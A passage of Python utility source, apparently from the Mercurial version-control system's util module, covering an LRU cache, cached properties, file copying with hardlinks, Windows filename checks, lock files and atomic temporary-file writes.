1405 1405 for i in range(len(self._cache)):
1406 1406 result.insert(n.key, n.value, cost=n.cost)
1407 1407 n = n.prev
1408 1408
1409 1409 return result
1410 1410
1411 1411 def popoldest(self):
1412 1412 """Remove the oldest item from the cache.
1413 1413
1414 1414 Returns the (key, value) describing the removed cache entry.
1415 1415 """
1416 1416 if not self._cache:
1417 1417 return
1418 1418
1419 1419 # Walk the linked list backwards starting at tail node until we hit
1420 1420 # a non-empty node.
1421 1421 n = self._head.prev
1422 1422 while n.key is _notset:
1423 1423 n = n.prev
1424 1424
1425 1425 key, value = n.key, n.value
1426 1426
1427 1427 # And remove it from the cache and mark it as empty.
1428 1428 del self._cache[n.key]
1429 1429 self.totalcost -= n.cost
1430 1430 n.markempty()
1431 1431
1432 1432 return key, value
1433 1433
1434 1434 def _movetohead(self, node):
1435 1435 """Mark a node as the newest, making it the new head.
1436 1436
1437 1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 1438 list, which is denoted by self._head.
1439 1439
1440 1440 Visually, let's make ``N`` the new head node (* denotes head):
1441 1441
1442 1442 previous/oldest <-> head <-> next/next newest
1443 1443
1444 1444 ----<->--- A* ---<->-----
1445 1445 | |
1446 1446 E <-> D <-> N <-> C <-> B
1447 1447
1448 1448 To:
1449 1449
1450 1450 ----<->--- N* ---<->-----
1451 1451 | |
1452 1452 E <-> D <-> C <-> B <-> A
1453 1453
1454 1454 This requires the following moves:
1455 1455
1456 1456 C.next = D (node.prev.next = node.next)
1457 1457 D.prev = C (node.next.prev = node.prev)
1458 1458 E.next = N (head.prev.next = node)
1459 1459 N.prev = E (node.prev = head.prev)
1460 1460 N.next = A (node.next = head)
1461 1461 A.prev = N (head.prev = node)
1462 1462 """
1463 1463 head = self._head
1464 1464 # C.next = D
1465 1465 node.prev.next = node.next
1466 1466 # D.prev = C
1467 1467 node.next.prev = node.prev
1468 1468 # N.prev = E
1469 1469 node.prev = head.prev
1470 1470 # N.next = A
1471 1471 # It is tempting to do just "head" here, however if node is
1472 1472 # adjacent to head, this will do bad things.
1473 1473 node.next = head.prev.next
1474 1474 # E.next = N
1475 1475 node.next.prev = node
1476 1476 # A.prev = N
1477 1477 node.prev.next = node
1478 1478
1479 1479 self._head = node
1480 1480
1481 1481 def _addcapacity(self):
1482 1482 """Add a node to the circular linked list.
1483 1483
1484 1484 The new node is inserted before the head node.
1485 1485 """
1486 1486 head = self._head
1487 1487 node = _lrucachenode()
1488 1488 head.prev.next = node
1489 1489 node.prev = head.prev
1490 1490 node.next = head
1491 1491 head.prev = node
1492 1492 self._size += 1
1493 1493 return node
1494 1494
1495 1495 def _enforcecostlimit(self):
1496 1496 # This should run after an insertion. It should only be called if total
1497 1497 # cost limits are being enforced.
1498 1498 # The most recently inserted node is never evicted.
1499 1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 1500 return
1501 1501
1502 1502 # This is logically equivalent to calling popoldest() until we
1503 1503 # free up enough cost. We don't do that since popoldest() needs
1504 1504 # to walk the linked list and doing this in a loop would be
1505 1505 # quadratic. So we find the first non-empty node and then
1506 1506 # walk nodes until we free up enough capacity.
1507 1507 #
1508 1508 # If we only removed the minimum number of nodes to free enough
1509 1509 # cost at insert time, chances are high that the next insert would
1510 1510 # also require pruning. This would effectively constitute quadratic
1511 1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 1512 # target cost that is a percentage of the max cost. This will tend
1513 1513 # to free more nodes when the high water mark is reached, which
1514 1514 # lowers the chances of needing to prune on the subsequent insert.
1515 1515 targetcost = int(self.maxcost * 0.75)
1516 1516
1517 1517 n = self._head.prev
1518 1518 while n.key is _notset:
1519 1519 n = n.prev
1520 1520
1521 1521 while len(self) > 1 and self.totalcost > targetcost:
1522 1522 del self._cache[n.key]
1523 1523 self.totalcost -= n.cost
1524 1524 n.markempty()
1525 1525 n = n.prev
1526 1526
1527 1527 def lrucachefunc(func):
1528 1528 '''cache most recent results of function calls'''
1529 1529 cache = {}
1530 1530 order = collections.deque()
1531 1531 if func.__code__.co_argcount == 1:
1532 1532 def f(arg):
1533 1533 if arg not in cache:
1534 1534 if len(cache) > 20:
1535 1535 del cache[order.popleft()]
1536 1536 cache[arg] = func(arg)
1537 1537 else:
1538 1538 order.remove(arg)
1539 1539 order.append(arg)
1540 1540 return cache[arg]
1541 1541 else:
1542 1542 def f(*args):
1543 1543 if args not in cache:
1544 1544 if len(cache) > 20:
1545 1545 del cache[order.popleft()]
1546 1546 cache[args] = func(*args)
1547 1547 else:
1548 1548 order.remove(args)
1549 1549 order.append(args)
1550 1550 return cache[args]
1551 1551
1552 1552 return f
1553 1553
1554 1554 class propertycache(object):
1555 1555 def __init__(self, func):
1556 1556 self.func = func
1557 1557 self.name = func.__name__
1558 1558 def __get__(self, obj, type=None):
1559 1559 result = self.func(obj)
1560 1560 self.cachevalue(obj, result)
1561 1561 return result
1562 1562
1563 1563 def cachevalue(self, obj, value):
1564 1564 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1565 1565 obj.__dict__[self.name] = value
1566 1566
1567 1567 def clearcachedproperty(obj, prop):
1568 1568 '''clear a cached property value, if one has been set'''
1569 1569 prop = pycompat.sysstr(prop)
1570 1570 if prop in obj.__dict__:
1571 1571 del obj.__dict__[prop]
1572 1572
1573 1573 def increasingchunks(source, min=1024, max=65536):
1574 1574 '''return no less than min bytes per chunk while data remains,
1575 1575 doubling min after each chunk until it reaches max'''
1576 1576 def log2(x):
1577 1577 if not x:
1578 1578 return 0
1579 1579 i = 0
1580 1580 while x:
1581 1581 x >>= 1
1582 1582 i += 1
1583 1583 return i - 1
1584 1584
1585 1585 buf = []
1586 1586 blen = 0
1587 1587 for chunk in source:
1588 1588 buf.append(chunk)
1589 1589 blen += len(chunk)
1590 1590 if blen >= min:
1591 1591 if min < max:
1592 1592 min = min << 1
1593 1593 nmin = 1 << log2(blen)
1594 1594 if nmin > min:
1595 1595 min = nmin
1596 1596 if min > max:
1597 1597 min = max
1598 1598 yield ''.join(buf)
1599 1599 blen = 0
1600 1600 buf = []
1601 1601 if buf:
1602 1602 yield ''.join(buf)
1603 1603
1604 1604 def always(fn):
1605 1605 return True
1606 1606
1607 1607 def never(fn):
1608 1608 return False
1609 1609
1610 1610 def nogc(func):
1611 1611 """disable garbage collector
1612 1612
1613 1613 Python's garbage collector triggers a GC each time a certain number of
1614 1614 container objects (the number being defined by gc.get_threshold()) are
1615 1615 allocated even when marked not to be tracked by the collector. Tracking has
1616 1616 no effect on when GCs are triggered, only on what objects the GC looks
1617 1617 into. As a workaround, disable GC while building complex (huge)
1618 1618 containers.
1619 1619
1620 1620 This garbage collector issue have been fixed in 2.7. But it still affect
1621 1621 CPython's performance.
1622 1622 """
1623 1623 def wrapper(*args, **kwargs):
1624 1624 gcenabled = gc.isenabled()
1625 1625 gc.disable()
1626 1626 try:
1627 1627 return func(*args, **kwargs)
1628 1628 finally:
1629 1629 if gcenabled:
1630 1630 gc.enable()
1631 1631 return wrapper
1632 1632
1633 1633 if pycompat.ispypy:
1634 1634 # PyPy runs slower with gc disabled
1635 1635 nogc = lambda x: x
1636 1636
1637 1637 def pathto(root, n1, n2):
1638 1638 '''return the relative path from one place to another.
1639 1639 root should use os.sep to separate directories
1640 1640 n1 should use os.sep to separate directories
1641 1641 n2 should use "/" to separate directories
1642 1642 returns an os.sep-separated path.
1643 1643
1644 1644 If n1 is a relative path, it's assumed it's
1645 1645 relative to root.
1646 1646 n2 should always be relative to root.
1647 1647 '''
1648 1648 if not n1:
1649 1649 return localpath(n2)
1650 1650 if os.path.isabs(n1):
1651 1651 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1652 1652 return os.path.join(root, localpath(n2))
1653 1653 n2 = '/'.join((pconvert(root), n2))
1654 1654 a, b = splitpath(n1), n2.split('/')
1655 1655 a.reverse()
1656 1656 b.reverse()
1657 1657 while a and b and a[-1] == b[-1]:
1658 1658 a.pop()
1659 1659 b.pop()
1660 1660 b.reverse()
1661 1661 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1662 1662
1663 1663 # the location of data files matching the source code
1664 1664 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1665 1665 # executable version (py2exe) doesn't support __file__
1666 1666 datapath = os.path.dirname(pycompat.sysexecutable)
1667 1667 else:
1668 1668 datapath = os.path.dirname(pycompat.fsencode(__file__))
1669 1669
1670 1670 i18n.setdatapath(datapath)
1671 1671
1672 1672 def checksignature(func):
1673 1673 '''wrap a function with code to check for calling errors'''
1674 1674 def check(*args, **kwargs):
1675 1675 try:
1676 1676 return func(*args, **kwargs)
1677 1677 except TypeError:
1678 1678 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1679 1679 raise error.SignatureError
1680 1680 raise
1681 1681
1682 1682 return check
1683 1683
1684 1684 # a whilelist of known filesystems where hardlink works reliably
1685 1685 _hardlinkfswhitelist = {
1686 1686 'apfs',
1687 1687 'btrfs',
1688 1688 'ext2',
1689 1689 'ext3',
1690 1690 'ext4',
1691 1691 'hfs',
1692 1692 'jfs',
1693 1693 'NTFS',
1694 1694 'reiserfs',
1695 1695 'tmpfs',
1696 1696 'ufs',
1697 1697 'xfs',
1698 1698 'zfs',
1699 1699 }
1700 1700
1701 1701 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1702 1702 '''copy a file, preserving mode and optionally other stat info like
1703 1703 atime/mtime
1704 1704
1705 1705 checkambig argument is used with filestat, and is useful only if
1706 1706 destination file is guarded by any lock (e.g. repo.lock or
1707 1707 repo.wlock).
1708 1708
1709 1709 copystat and checkambig should be exclusive.
1710 1710 '''
1711 1711 assert not (copystat and checkambig)
1712 1712 oldstat = None
1713 1713 if os.path.lexists(dest):
1714 1714 if checkambig:
1715 1715 oldstat = checkambig and filestat.frompath(dest)
1716 1716 unlink(dest)
1717 1717 if hardlink:
1718 1718 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1719 1719 # unless we are confident that dest is on a whitelisted filesystem.
1720 1720 try:
1721 1721 fstype = getfstype(os.path.dirname(dest))
1722 1722 except OSError:
1723 1723 fstype = None
1724 1724 if fstype not in _hardlinkfswhitelist:
1725 1725 hardlink = False
1726 1726 if hardlink:
1727 1727 try:
1728 1728 oslink(src, dest)
1729 1729 return
1730 1730 except (IOError, OSError):
1731 1731 pass # fall back to normal copy
1732 1732 if os.path.islink(src):
1733 1733 os.symlink(os.readlink(src), dest)
1734 1734 # copytime is ignored for symlinks, but in general copytime isn't needed
1735 1735 # for them anyway
1736 1736 else:
1737 1737 try:
1738 1738 shutil.copyfile(src, dest)
1739 1739 if copystat:
1740 1740 # copystat also copies mode
1741 1741 shutil.copystat(src, dest)
1742 1742 else:
1743 1743 shutil.copymode(src, dest)
1744 1744 if oldstat and oldstat.stat:
1745 1745 newstat = filestat.frompath(dest)
1746 1746 if newstat.isambig(oldstat):
1747 1747 # stat of copied file is ambiguous to original one
1748 1748 advanced = (
1749 1749 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1750 1750 os.utime(dest, (advanced, advanced))
1751 1751 except shutil.Error as inst:
1752 1752 raise error.Abort(str(inst))
1753 1753
1754 1754 def copyfiles(src, dst, hardlink=None, progress=None):
1755 1755 """Copy a directory tree using hardlinks if possible."""
1756 1756 num = 0
1757 1757
1758 1758 def settopic():
1759 1759 if progress:
1760 1760 progress.topic = _('linking') if hardlink else _('copying')
1761 1761
1762 1762 if os.path.isdir(src):
1763 1763 if hardlink is None:
1764 1764 hardlink = (os.stat(src).st_dev ==
1765 1765 os.stat(os.path.dirname(dst)).st_dev)
1766 1766 settopic()
1767 1767 os.mkdir(dst)
1768 1768 for name, kind in listdir(src):
1769 1769 srcname = os.path.join(src, name)
1770 1770 dstname = os.path.join(dst, name)
1771 1771 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1772 1772 num += n
1773 1773 else:
1774 1774 if hardlink is None:
1775 1775 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1776 1776 os.stat(os.path.dirname(dst)).st_dev)
1777 1777 settopic()
1778 1778
1779 1779 if hardlink:
1780 1780 try:
1781 1781 oslink(src, dst)
1782 1782 except (IOError, OSError):
1783 1783 hardlink = False
1784 1784 shutil.copy(src, dst)
1785 1785 else:
1786 1786 shutil.copy(src, dst)
1787 1787 num += 1
1788 1788 if progress:
1789 1789 progress.increment()
1790 1790
1791 1791 return hardlink, num
1792 1792
1793 1793 _winreservednames = {
1794 1794 'con', 'prn', 'aux', 'nul',
1795 1795 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1796 1796 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1797 1797 }
1798 1798 _winreservedchars = ':*?"<>|'
1799 1799 def checkwinfilename(path):
1800 1800 r'''Check that the base-relative path is a valid filename on Windows.
1801 1801 Returns None if the path is ok, or a UI string describing the problem.
1802 1802
1803 1803 >>> checkwinfilename(b"just/a/normal/path")
1804 1804 >>> checkwinfilename(b"foo/bar/con.xml")
1805 1805 "filename contains 'con', which is reserved on Windows"
1806 1806 >>> checkwinfilename(b"foo/con.xml/bar")
1807 1807 "filename contains 'con', which is reserved on Windows"
1808 1808 >>> checkwinfilename(b"foo/bar/xml.con")
1809 1809 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1810 1810 "filename contains 'AUX', which is reserved on Windows"
1811 1811 >>> checkwinfilename(b"foo/bar/bla:.txt")
1812 1812 "filename contains ':', which is reserved on Windows"
1813 1813 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1814 1814 "filename contains '\\x07', which is invalid on Windows"
1815 1815 >>> checkwinfilename(b"foo/bar/bla ")
1816 1816 "filename ends with ' ', which is not allowed on Windows"
1817 1817 >>> checkwinfilename(b"../bar")
1818 1818 >>> checkwinfilename(b"foo\\")
1819 1819 "filename ends with '\\', which is invalid on Windows"
1820 1820 >>> checkwinfilename(b"foo\\/bar")
1821 1821 "directory name ends with '\\', which is invalid on Windows"
1822 1822 '''
1823 1823 if path.endswith('\\'):
1824 1824 return _("filename ends with '\\', which is invalid on Windows")
1825 1825 if '\\/' in path:
1826 1826 return _("directory name ends with '\\', which is invalid on Windows")
1827 1827 for n in path.replace('\\', '/').split('/'):
1828 1828 if not n:
1829 1829 continue
1830 1830 for c in _filenamebytestr(n):
1831 1831 if c in _winreservedchars:
1832 1832 return _("filename contains '%s', which is reserved "
1833 1833 "on Windows") % c
1834 1834 if ord(c) <= 31:
1835 1835 return _("filename contains '%s', which is invalid "
1836 1836 "on Windows") % stringutil.escapestr(c)
1837 1837 base = n.split('.')[0]
1838 1838 if base and base.lower() in _winreservednames:
1839 1839 return _("filename contains '%s', which is reserved "
1840 1840 "on Windows") % base
1841 1841 t = n[-1:]
1842 1842 if t in '. ' and n not in '..':
1843 1843 return _("filename ends with '%s', which is not allowed "
1844 1844 "on Windows") % t
1845 1845
1846 1846 if pycompat.iswindows:
1847 1847 checkosfilename = checkwinfilename
1848 1848 timer = time.clock
1849 1849 else:
1850 1850 checkosfilename = platform.checkosfilename
1851 1851 timer = time.time
1852 1852
1853 1853 if safehasattr(time, "perf_counter"):
1854 1854 timer = time.perf_counter
1855 1855
1856 1856 def makelock(info, pathname):
1857 1857 """Create a lock file atomically if possible
1858 1858
1859 1859 This may leave a stale lock file if symlink isn't supported and signal
1860 1860 interrupt is enabled.
1861 1861 """
1862 1862 try:
1863 1863 return os.symlink(info, pathname)
1864 1864 except OSError as why:
1865 1865 if why.errno == errno.EEXIST:
1866 1866 raise
1867 1867 except AttributeError: # no symlink in os
1868 1868 pass
1869 1869
1870 1870 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1871 1871 ld = os.open(pathname, flags)
1872 1872 os.write(ld, info)
1873 1873 os.close(ld)
1874 1874
1875 1875 def readlock(pathname):
1876 1876 try:
1877 1877 return readlink(pathname)
1878 1878 except OSError as why:
1879 1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1880 1880 raise
1881 1881 except AttributeError: # no symlink in os
1882 1882 pass
1883 1883 with posixfile(pathname, 'rb') as fp:
1884 1884 return fp.read()
1885 1885
1886 1886 def fstat(fp):
1887 1887 '''stat file object that may not have fileno method.'''
1888 1888 try:
1889 1889 return os.fstat(fp.fileno())
1890 1890 except AttributeError:
1891 1891 return os.stat(fp.name)
1892 1892
1893 1893 # File system features
1894 1894
1895 1895 def fscasesensitive(path):
1896 1896 """
1897 1897 Return true if the given path is on a case-sensitive filesystem
1898 1898
1899 1899 Requires a path (like /foo/.hg) ending with a foldable final
1900 1900 directory component.
1901 1901 """
1902 1902 s1 = os.lstat(path)
1903 1903 d, b = os.path.split(path)
1904 1904 b2 = b.upper()
1905 1905 if b == b2:
1906 1906 b2 = b.lower()
1907 1907 if b == b2:
1908 1908 return True # no evidence against case sensitivity
1909 1909 p2 = os.path.join(d, b2)
1910 1910 try:
1911 1911 s2 = os.lstat(p2)
1912 1912 if s2 == s1:
1913 1913 return False
1914 1914 return True
1915 1915 except OSError:
1916 1916 return True
1917 1917
1918 1918 try:
1919 1919 import re2
1920 1920 _re2 = None
1921 1921 except ImportError:
1922 1922 _re2 = False
1923 1923
1924 1924 class _re(object):
1925 1925 def _checkre2(self):
1926 1926 global _re2
1927 1927 try:
1928 1928 # check if match works, see issue3964
1929 1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1930 1930 except ImportError:
1931 1931 _re2 = False
1932 1932
1933 1933 def compile(self, pat, flags=0):
1934 1934 '''Compile a regular expression, using re2 if possible
1935 1935
1936 1936 For best performance, use only re2-compatible regexp features. The
1937 1937 only flags from the re module that are re2-compatible are
1938 1938 IGNORECASE and MULTILINE.'''
1939 1939 if _re2 is None:
1940 1940 self._checkre2()
1941 1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1942 1942 if flags & remod.IGNORECASE:
1943 1943 pat = '(?i)' + pat
1944 1944 if flags & remod.MULTILINE:
1945 1945 pat = '(?m)' + pat
1946 1946 try:
1947 1947 return re2.compile(pat)
1948 1948 except re2.error:
1949 1949 pass
1950 1950 return remod.compile(pat, flags)
1951 1951
1952 1952 @propertycache
1953 1953 def escape(self):
1954 1954 '''Return the version of escape corresponding to self.compile.
1955 1955
1956 1956 This is imperfect because whether re2 or re is used for a particular
1957 1957 function depends on the flags, etc, but it's the best we can do.
1958 1958 '''
1959 1959 global _re2
1960 1960 if _re2 is None:
1961 1961 self._checkre2()
1962 1962 if _re2:
1963 1963 return re2.escape
1964 1964 else:
1965 1965 return remod.escape
1966 1966
1967 1967 re = _re()
1968 1968
1969 1969 _fspathcache = {}
1970 1970 def fspath(name, root):
1971 1971 '''Get name in the case stored in the filesystem
1972 1972
1973 1973 The name should be relative to root, and be normcase-ed for efficiency.
1974 1974
1975 1975 Note that this function is unnecessary, and should not be
1976 1976 called, for case-sensitive filesystems (simply because it's expensive).
1977 1977
1978 1978 The root should be normcase-ed, too.
1979 1979 '''
1980 1980 def _makefspathcacheentry(dir):
1981 1981 return dict((normcase(n), n) for n in os.listdir(dir))
1982 1982
1983 1983 seps = pycompat.ossep
1984 1984 if pycompat.osaltsep:
1985 1985 seps = seps + pycompat.osaltsep
1986 1986 # Protect backslashes. This gets silly very quickly.
1987 1987 seps.replace('\\','\\\\')
1988 1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1989 1989 dir = os.path.normpath(root)
1990 1990 result = []
1991 1991 for part, sep in pattern.findall(name):
1992 1992 if sep:
1993 1993 result.append(sep)
1994 1994 continue
1995 1995
1996 1996 if dir not in _fspathcache:
1997 1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1998 1998 contents = _fspathcache[dir]
1999 1999
2000 2000 found = contents.get(part)
2001 2001 if not found:
2002 2002 # retry "once per directory" per "dirstate.walk" which
2003 2003 # may take place for each patches of "hg qpush", for example
2004 2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2005 2005 found = contents.get(part)
2006 2006
2007 2007 result.append(found or part)
2008 2008 dir = os.path.join(dir, part)
2009 2009
2010 2010 return ''.join(result)
2011 2011
2012 2012 def checknlink(testfile):
2013 2013 '''check whether hardlink count reporting works properly'''
2014 2014
2015 2015 # testfile may be open, so we need a separate file for checking to
2016 2016 # work around issue2543 (or testfile may get lost on Samba shares)
2017 2017 f1, f2, fp = None, None, None
2018 2018 try:
2019 2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2020 2020 suffix='1~', dir=os.path.dirname(testfile))
2021 2021 os.close(fd)
2022 2022 f2 = '%s2~' % f1[:-2]
2023 2023
2024 2024 oslink(f1, f2)
2025 2025 # nlinks() may behave differently for files on Windows shares if
2026 2026 # the file is open.
2027 2027 fp = posixfile(f2)
2028 2028 return nlinks(f2) > 1
2029 2029 except OSError:
2030 2030 return False
2031 2031 finally:
2032 2032 if fp is not None:
2033 2033 fp.close()
2034 2034 for f in (f1, f2):
2035 2035 try:
2036 2036 if f is not None:
2037 2037 os.unlink(f)
2038 2038 except OSError:
2039 2039 pass
2040 2040
2041 2041 def endswithsep(path):
2042 2042 '''Check path ends with os.sep or os.altsep.'''
2043 2043 return (path.endswith(pycompat.ossep)
2044 2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2045 2045
2046 2046 def splitpath(path):
2047 2047 '''Split path by os.sep.
2048 2048 Note that this function does not use os.altsep because this is
2049 2049 an alternative of simple "xxx.split(os.sep)".
2050 2050 It is recommended to use os.path.normpath() before using this
2051 2051 function if need.'''
2052 2052 return path.split(pycompat.ossep)
2053 2053
2054 2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2055 2055 """Create a temporary file with the same contents from name
2056 2056
2057 2057 The permission bits are copied from the original file.
2058 2058
2059 2059 If the temporary file is going to be truncated immediately, you
2060 2060 can use emptyok=True as an optimization.
2061 2061
2062 2062 Returns the name of the temporary file.
2063 2063 """
2064 2064 d, fn = os.path.split(name)
2065 2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2066 2066 os.close(fd)
2067 2067 # Temporary files are created with mode 0600, which is usually not
2068 2068 # what we want. If the original file already exists, just copy
2069 2069 # its mode. Otherwise, manually obey umask.
2070 2070 copymode(name, temp, createmode, enforcewritable)
2071 2071
2072 2072 if emptyok:
2073 2073 return temp
2074 2074 try:
2075 2075 try:
2076 2076 ifp = posixfile(name, "rb")
2077 2077 except IOError as inst:
2078 2078 if inst.errno == errno.ENOENT:
2079 2079 return temp
2080 2080 if not getattr(inst, 'filename', None):
2081 2081 inst.filename = name
2082 2082 raise
2083 2083 ofp = posixfile(temp, "wb")
2084 2084 for chunk in filechunkiter(ifp):
2085 2085 ofp.write(chunk)
2086 2086 ifp.close()
2087 2087 ofp.close()
2088 2088 except: # re-raises
2089 2089 try:
2090 2090 os.unlink(temp)
2091 2091 except OSError:
2092 2092 pass
2093 2093 raise
2094 2094 return temp
2095 2095
2096 2096 class filestat(object):
2097 2097 """help to exactly detect change of a file
2098 2098
2099 2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2100 2100 exists. Otherwise, it is None. This can avoid preparative
2101 2101 'exists()' examination on client side of this class.
2102 2102 """
2103 2103 def __init__(self, stat):
2104 2104 self.stat = stat
2105 2105
2106 2106 @classmethod
2107 2107 def frompath(cls, path):
2108 2108 try:
2109 2109 stat = os.stat(path)
2110 2110 except OSError as err:
2111 2111 if err.errno != errno.ENOENT:
2112 2112 raise
2113 2113 stat = None
2114 2114 return cls(stat)
2115 2115
2116 2116 @classmethod
2117 2117 def fromfp(cls, fp):
2118 2118 stat = os.fstat(fp.fileno())
2119 2119 return cls(stat)
2120 2120
2121 2121 __hash__ = object.__hash__
2122 2122
2123 2123 def __eq__(self, old):
2124 2124 try:
2125 2125 # if ambiguity between stat of new and old file is
2126 2126 # avoided, comparison of size, ctime and mtime is enough
2127 2127 # to exactly detect change of a file regardless of platform
2128 2128 return (self.stat.st_size == old.stat.st_size and
2129 2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2130 2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2131 2131 except AttributeError:
2132 2132 pass
2133 2133 try:
2134 2134 return self.stat is None and old.stat is None
2135 2135 except AttributeError:
2136 2136 return False
2137 2137
2138 2138 def isambig(self, old):
2139 2139 """Examine whether new (= self) stat is ambiguous against old one
2140 2140
2141 2141 "S[N]" below means stat of a file at N-th change:
2142 2142
2143 2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2144 2144 - S[n-1].ctime == S[n].ctime
2145 2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2146 2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2147 2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2148 2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2149 2149
2150 2150 Case (*2) above means that a file was changed twice or more at
2151 2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2152 2152 is ambiguous.
2153 2153
2154 2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2155 2155 timestamp is ambiguous".
2156 2156
2157 2157 But advancing mtime only in case (*2) doesn't work as
2158 2158 expected, because naturally advanced S[n].mtime in case (*1)
2159 2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2160 2160
2161 2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2162 2162 treated as ambiguous regardless of mtime, to avoid overlooking
2163 2163 by confliction between such mtime.
2164 2164
2165 2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2166 2166 S[n].mtime", even if size of a file isn't changed.
2167 2167 """
2168 2168 try:
2169 2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2170 2170 except AttributeError:
2171 2171 return False
2172 2172
2173 2173 def avoidambig(self, path, old):
2174 2174 """Change file stat of specified path to avoid ambiguity
2175 2175
2176 2176 'old' should be previous filestat of 'path'.
2177 2177
2178 2178 This skips avoiding ambiguity, if a process doesn't have
2179 2179 appropriate privileges for 'path'. This returns False in this
2180 2180 case.
2181 2181
2182 2182 Otherwise, this returns True, as "ambiguity is avoided".
2183 2183 """
2184 2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2185 2185 try:
2186 2186 os.utime(path, (advanced, advanced))
2187 2187 except OSError as inst:
2188 2188 if inst.errno == errno.EPERM:
2189 2189 # utime() on the file created by another user causes EPERM,
2190 2190 # if a process doesn't have appropriate privileges
2191 2191 return False
2192 2192 raise
2193 2193 return True
2194 2194
2195 2195 def __ne__(self, other):
2196 2196 return not self == other
2197 2197
2198 2198 class atomictempfile(object):
2199 2199 '''writable file object that atomically updates a file
2200 2200
2201 2201 All writes will go to a temporary copy of the original file. Call
2202 2202 close() when you are done writing, and atomictempfile will rename
2203 2203 the temporary copy to the original name, making the changes
2204 2204 visible. If the object is destroyed without being closed, all your
2205 2205 writes are discarded.
2206 2206
2207 2207 checkambig argument of constructor is used with filestat, and is
2208 2208 useful only if target file is guarded by any lock (e.g. repo.lock
2209 2209 or repo.wlock).
2210 2210 '''
2211 2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2212 2212 self.__name = name # permanent name
2213 2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2214 2214 createmode=createmode,
2215 2215 enforcewritable=('w' in mode))
2216 2216
2217 2217 self._fp = posixfile(self._tempname, mode)
2218 2218 self._checkambig = checkambig
2219 2219
2220 2220 # delegated methods
2221 2221 self.read = self._fp.read
2222 2222 self.write = self._fp.write
2223 2223 self.seek = self._fp.seek
2224 2224 self.tell = self._fp.tell
2225 2225 self.fileno = self._fp.fileno
2226 2226
2227 2227 def close(self):
2228 2228 if not self._fp.closed:
2229 2229 self._fp.close()
2230 2230 filename = localpath(self.__name)
2231 2231 oldstat = self._checkambig and filestat.frompath(filename)
2232 2232 if oldstat and oldstat.stat:
2233 2233 rename(self._tempname, filename)
2234 2234 newstat = filestat.frompath(filename)
2235 2235 if newstat.isambig(oldstat):
2236 2236 # stat of changed file is ambiguous to original one
2237 2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2238 2238 os.utime(filename, (advanced, advanced))
2239 2239 else:
2240 2240 rename(self._tempname, filename)
2241 2241
2242 2242 def discard(self):
2243 2243 if not self._fp.closed:
2244 2244 try:
2245 2245 os.unlink(self._tempname)
2246 2246 except OSError:
2247 2247 pass
2248 2248 self._fp.close()
2249 2249
2250 2250 def __del__(self):
2251 2251 if safehasattr(self, '_fp'): # constructor actually did something
2252 2252 self.discard()
2253 2253
2254 2254 def __enter__(self):
2255 2255 return self
2256 2256
2257 2257 def __exit__(self, exctype, excvalue, traceback):
2258 2258 if exctype is not None:
2259 2259 self.discard()
2260 2260 else:
2261 2261 self.close()
2262 2262
2263 2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2264 2264 """unlink and remove the directory if it is empty"""
2265 2265 if ignoremissing:
2266 2266 tryunlink(f)
2267 2267 else:
2268 2268 unlink(f)
2269 2269 if rmdir:
2270 2270 # try removing directories that might now be empty
2271 2271 try:
2272 2272 removedirs(os.path.dirname(f))
2273 2273 except OSError:
2274 2274 pass
2275 2275
2276 2276 def tryunlink(f):
2277 2277 """Attempt to remove a file, ignoring ENOENT errors."""
2278 2278 try:
2279 2279 unlink(f)
2280 2280 except OSError as e:
2281 2281 if e.errno != errno.ENOENT:
2282 2282 raise
2283 2283
2284 2284 def makedirs(name, mode=None, notindexed=False):
2285 2285 """recursive directory creation with parent mode inheritance
